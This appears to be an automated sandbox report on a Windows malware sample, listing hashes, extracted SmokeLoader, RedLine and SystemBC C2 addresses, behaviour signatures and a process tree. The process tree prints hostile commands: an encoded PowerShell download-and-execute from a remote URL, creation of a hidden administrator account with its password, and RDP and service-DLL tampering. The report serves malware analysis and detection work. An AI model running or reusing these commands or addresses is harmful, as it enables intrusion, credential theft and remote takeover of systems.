Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09-12-2021 11:41
General
-
Target
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
-
Size
299KB
-
MD5
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4
-
SHA1
e5d892d8c416d2768f12e7f45c8588a0c98f5987
-
SHA256
74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b
-
SHA512
041a14d3f3cc4d4264b5a151330c7022606d715888c3b30bc169010475e9171e1fa37c96181255e8d32fd6065a90a64f5a8df693fe3a5a0c9f92bd83998511f9
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Extracted
redline
1488
80.66.87.52:80
Extracted
systembc
185.209.30.180:4001
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 21 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe"C:\Users\Admin\AppData\Local\Temp\a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\93FF.exeC:\Users\Admin\AppData\Local\Temp\93FF.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\AC0C.exeC:\Users\Admin\AppData\Local\Temp\AC0C.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Knots.exe"C:\Users\Admin\AppData\Local\Temp\Knots.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Knots.exeC:\Users\Admin\AppData\Local\Temp\Knots.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D753.exeC:\Users\Admin\AppData\Local\Temp\D753.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\818.exeC:\Users\Admin\AppData\Local\Temp\818.exe1⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\818.exeC:\Users\Admin\AppData\Local\Temp\818.exe start1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\66B4.exeC:\Users\Admin\AppData\Local\Temp\66B4.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yslfveqh\yslfveqh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C4B.tmp" "c:\Users\Admin\AppData\Local\Temp\yslfveqh\CSCD8AF42A3F41B44E48AB9BE8C7AC1C03D.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d4myurk4\d4myurk4.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES815C.tmp" "c:\Users\Admin\AppData\Local\Temp\d4myurk4\CSC164F69DC1D604A2CA266B1C51A7947C4.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc h6iJyd4x /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc h6iJyd4x /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc h6iJyd4x /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc h6iJyd4x1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc h6iJyd4x2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc h6iJyd4x3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Knots.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Temp\66B4.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\66B4.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\818.exeMD5
fd4e0205ce36f99ff343a78ec3e251bc
SHA1b633df31339acb69f708a41fd227298420fd4036
SHA256617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
SHA512f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
-
C:\Users\Admin\AppData\Local\Temp\818.exeMD5
fd4e0205ce36f99ff343a78ec3e251bc
SHA1b633df31339acb69f708a41fd227298420fd4036
SHA256617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
SHA512f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
-
C:\Users\Admin\AppData\Local\Temp\818.exeMD5
fd4e0205ce36f99ff343a78ec3e251bc
SHA1b633df31339acb69f708a41fd227298420fd4036
SHA256617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
SHA512f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
-
C:\Users\Admin\AppData\Local\Temp\93FF.exeMD5
77ce7ab11225c5e723b7b1be0308e8c0
SHA1709a8df1d49f28cf8c293694bbbbd0f07735829b
SHA256d407b5c7d9568448f1e7387924fe4dded9e016632879c386c307ef5dcf63f496
SHA512f73582206397db625bdefbbaf8abdc1a820ae8054eb2ef2a3ed18c8e00e8365c7ad81013b33990e4304619b3834a1b8b15c782905204add158fca686e2c25c3b
-
C:\Users\Admin\AppData\Local\Temp\93FF.exeMD5
77ce7ab11225c5e723b7b1be0308e8c0
SHA1709a8df1d49f28cf8c293694bbbbd0f07735829b
SHA256d407b5c7d9568448f1e7387924fe4dded9e016632879c386c307ef5dcf63f496
SHA512f73582206397db625bdefbbaf8abdc1a820ae8054eb2ef2a3ed18c8e00e8365c7ad81013b33990e4304619b3834a1b8b15c782905204add158fca686e2c25c3b
-
C:\Users\Admin\AppData\Local\Temp\AC0C.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\AC0C.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\D753.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\D753.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\Knots.exeMD5
e1c9ff41a69e7b381d498c56243e3f19
SHA1b09e041a9d71ab8bc5965ffb3dd14d74ea932bce
SHA2561482d5afef2f604625b850fbe609699c64a342d1880e9d27ef62a77817b75cdc
SHA512a005c87491bb48d96af386e8ed9cf3604a2fa708ea03219404587d69470e4516e8e71f7306e107c98b9baea83de29490cf81cdd216e752fce9b4019cf069885e
-
C:\Users\Admin\AppData\Local\Temp\Knots.exeMD5
e1c9ff41a69e7b381d498c56243e3f19
SHA1b09e041a9d71ab8bc5965ffb3dd14d74ea932bce
SHA2561482d5afef2f604625b850fbe609699c64a342d1880e9d27ef62a77817b75cdc
SHA512a005c87491bb48d96af386e8ed9cf3604a2fa708ea03219404587d69470e4516e8e71f7306e107c98b9baea83de29490cf81cdd216e752fce9b4019cf069885e
-
C:\Users\Admin\AppData\Local\Temp\Knots.exeMD5
e1c9ff41a69e7b381d498c56243e3f19
SHA1b09e041a9d71ab8bc5965ffb3dd14d74ea932bce
SHA2561482d5afef2f604625b850fbe609699c64a342d1880e9d27ef62a77817b75cdc
SHA512a005c87491bb48d96af386e8ed9cf3604a2fa708ea03219404587d69470e4516e8e71f7306e107c98b9baea83de29490cf81cdd216e752fce9b4019cf069885e
-
C:\Users\Admin\AppData\Local\Temp\RES7C4B.tmpMD5
966ebe26f37e7d46cef677af3727bada
SHA1db9a694c05425a11cee97b2344dcf6f441593a51
SHA256cc15c3449b65d084218644ca07df7e359887130dea4fee9d1b613b83d3f0f75e
SHA5124d5bb06d1468893586813305b3e51db00aa9b939edaf94f9176b839aa47c723228c4bde8d6ab452d493e5679a4378ac17d04d7b052567b82b2d6493b13a8a8ad
-
C:\Users\Admin\AppData\Local\Temp\RES815C.tmpMD5
bb5225f74be369bd99427cc508a65359
SHA13b7902e3df8d46044dab6ff914c99d5ab28c98fa
SHA2564db0d8c2b6c35e1d7f72df0d49b3304bd62c056613095439c55ad3fc56aac04b
SHA51246d81400c70025308c3d43262cd848133c402e7974bad4986b5b27e40eba7a476d6285d547bed5c2e96c6bc591fd9526fb73f6bfd18017827374e479d402af41
-
C:\Users\Admin\AppData\Local\Temp\d4myurk4\d4myurk4.dllMD5
b34720a050aa91a122cd7fc82d66d2f7
SHA11eb82ec4dd47730b1e30c196b587a7a4fc9d63ab
SHA25636db98c21fd44c13f4cc24368e58fc447a1893879670eab21fb7f5ea6d6bd45a
SHA5126a0f43343bac4f2d0e943718ad34021efcae54375bea6d949187856b39d93f9c3c24776211dd3e0704a6de05ff2ec3a7d120eed6a84eab33a80d4dbe190bbc66
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
854b2dfc0a28f2959b1d2fc363a4e318
SHA1ce1753052c5bdad56708ec75d8085b2c597df6c1
SHA2567135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
SHA512b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\yslfveqh\yslfveqh.dllMD5
e904eaf43f600d22faa4a8aa1e26c0ed
SHA1c26a4e740621049b88896d4a7212ec2203fdd214
SHA25615d7dd66722d321a8210296732d927221fbffbdfe92e08af33508262799bd4cf
SHA51249e920bf4152e493c7bd83485b5add2763314c2ace63b6b69b405b10982352a0c698997d0035c709cc1c4385a2760d961602e7cfa9356599ae1982d56e1b010d
-
\??\c:\Users\Admin\AppData\Local\Temp\d4myurk4\CSC164F69DC1D604A2CA266B1C51A7947C4.TMPMD5
e43b6626a34b1308744537d455046d61
SHA155166237a7ee02c3063f1dc1ce1e0541141f7783
SHA256df3fcc5f5e46b694fa52f913d3b288451d4e89ca0514baea15797c1918a3da04
SHA512cdc5b5147fa18f198f8eb22562c3757f9c1d28f7b7a7377e9ea420e2311be477aaf8fa9be12af9fc86a1924ab6dc6750963d8c5f7dd6235c885a0b6b4bf0612f
-
\??\c:\Users\Admin\AppData\Local\Temp\d4myurk4\d4myurk4.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\d4myurk4\d4myurk4.cmdlineMD5
b325fabaa494d0afff79fc7bdeda98ae
SHA1bbbdcebe33dbda4a215f452705e8cdd34bb1e554
SHA2562a8d3648ea146817ffce7c6c5a6628d493e090baedc9ba2f49a25df04e908258
SHA51246272a982cb5586a983bbc4a2add29a2d5a42c2d481a4dbafc8e9a31040e1a2047bda6afe692274f241cab80210b2a3acd7e91ecd90176994748af169e437530
-
\??\c:\Users\Admin\AppData\Local\Temp\yslfveqh\CSCD8AF42A3F41B44E48AB9BE8C7AC1C03D.TMPMD5
0cc3f1c49ab726f91234b28fe9329ec1
SHA1ca04bfbd8f81c02f8b6923e68c0b818584ad41aa
SHA2568af65b599cdaac8f190dd01e7772e2200b0e6a4b4989d7db56a3701429aa5e03
SHA51239058704f5f56f5851fc75d42062aac20358d24bfc634c740a52f67bce929b4e2b6f21e5374abe21e638323ab0310a278d0e16d192c606da3658d151c5d28b84
-
\??\c:\Users\Admin\AppData\Local\Temp\yslfveqh\yslfveqh.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\yslfveqh\yslfveqh.cmdlineMD5
fe2277f021e01c2f12dc99265a64728f
SHA1c03dba8154664f87304604290fb8526fc0d6309f
SHA2569427374ffe1dc55802b1880cfeb4d8ec37e58f6309bd5b7e07cae33f7d6ded78
SHA5129791ea7682b7eae78b4a410a5a01360d2844720e7472b80c20962480472e8f2c1a25e33edf1afcc8d94f669d41fda3febe0aeae5def597fd0a2c06405585e2d3
-
\Windows\Branding\mediasrv.pngMD5
83bd2c45f1faf20a77579cbb8765c2b3
SHA1fe01b295c1005f4cbc0cfcb277dac5e7c443622c
SHA256ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
SHA512e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
-
\Windows\Branding\mediasvc.pngMD5
af4e893deae35128088534aea49a1b74
SHA1ce25e8e738978a2106e3464a7a4bf0345e60fd31
SHA25676dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
SHA5123115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
-
memory/68-494-0x0000000000000000-mapping.dmp
-
memory/392-490-0x0000000000000000-mapping.dmp
-
memory/592-259-0x0000000000000000-mapping.dmp
-
memory/692-513-0x0000000000000000-mapping.dmp
-
memory/928-448-0x0000000000000000-mapping.dmp
-
memory/1016-286-0x0000020E24D88000-0x0000020E24D89000-memory.dmpFilesize
4KB
-
memory/1016-240-0x0000000000000000-mapping.dmp
-
memory/1016-263-0x0000020E24D83000-0x0000020E24D85000-memory.dmpFilesize
8KB
-
memory/1016-262-0x0000020E24D80000-0x0000020E24D82000-memory.dmpFilesize
8KB
-
memory/1016-264-0x0000020E24D86000-0x0000020E24D88000-memory.dmpFilesize
8KB
-
memory/1136-447-0x0000000000000000-mapping.dmp
-
memory/1164-229-0x0000000002C70000-0x0000000002DBA000-memory.dmpFilesize
1.3MB
-
memory/1164-228-0x0000000002C70000-0x0000000002DBA000-memory.dmpFilesize
1.3MB
-
memory/1164-230-0x0000000000400000-0x0000000002B74000-memory.dmpFilesize
39.5MB
-
memory/1196-403-0x00000238EBD23000-0x00000238EBD25000-memory.dmpFilesize
8KB
-
memory/1196-265-0x0000000000000000-mapping.dmp
-
memory/1196-507-0x0000000000000000-mapping.dmp
-
memory/1196-384-0x0000000000000000-mapping.dmp
-
memory/1196-436-0x00000238EBD26000-0x00000238EBD28000-memory.dmpFilesize
8KB
-
memory/1196-402-0x00000238EBD20000-0x00000238EBD22000-memory.dmpFilesize
8KB
-
memory/1292-446-0x0000000000000000-mapping.dmp
-
memory/1432-512-0x0000000000000000-mapping.dmp
-
memory/1480-160-0x0000000006B80000-0x0000000006B81000-memory.dmpFilesize
4KB
-
memory/1480-139-0x0000000000000000-mapping.dmp
-
memory/1480-142-0x0000000000860000-0x0000000000861000-memory.dmpFilesize
4KB
-
memory/1480-149-0x0000000004FE0000-0x00000000055E6000-memory.dmpFilesize
6.0MB
-
memory/1748-506-0x0000000000000000-mapping.dmp
-
memory/1796-508-0x0000000000000000-mapping.dmp
-
memory/1816-497-0x0000000000000000-mapping.dmp
-
memory/1836-222-0x0000000002BD0000-0x0000000002BD6000-memory.dmpFilesize
24KB
-
memory/1836-213-0x0000000000000000-mapping.dmp
-
memory/1836-223-0x0000000002BE0000-0x0000000002BE5000-memory.dmpFilesize
20KB
-
memory/1836-227-0x0000000000400000-0x0000000002B74000-memory.dmpFilesize
39.5MB
-
memory/1856-504-0x0000000000000000-mapping.dmp
-
memory/1880-118-0x0000000000650000-0x0000000000666000-memory.dmpFilesize
88KB
-
memory/2056-514-0x0000000000000000-mapping.dmp
-
memory/2108-496-0x0000000000000000-mapping.dmp
-
memory/2140-191-0x00000000052E0000-0x00000000052E1000-memory.dmpFilesize
4KB
-
memory/2140-183-0x0000000000000000-mapping.dmp
-
memory/2140-192-0x00000000051D0000-0x00000000051D1000-memory.dmpFilesize
4KB
-
memory/2140-186-0x0000000000A00000-0x0000000000A01000-memory.dmpFilesize
4KB
-
memory/2336-501-0x0000000000000000-mapping.dmp
-
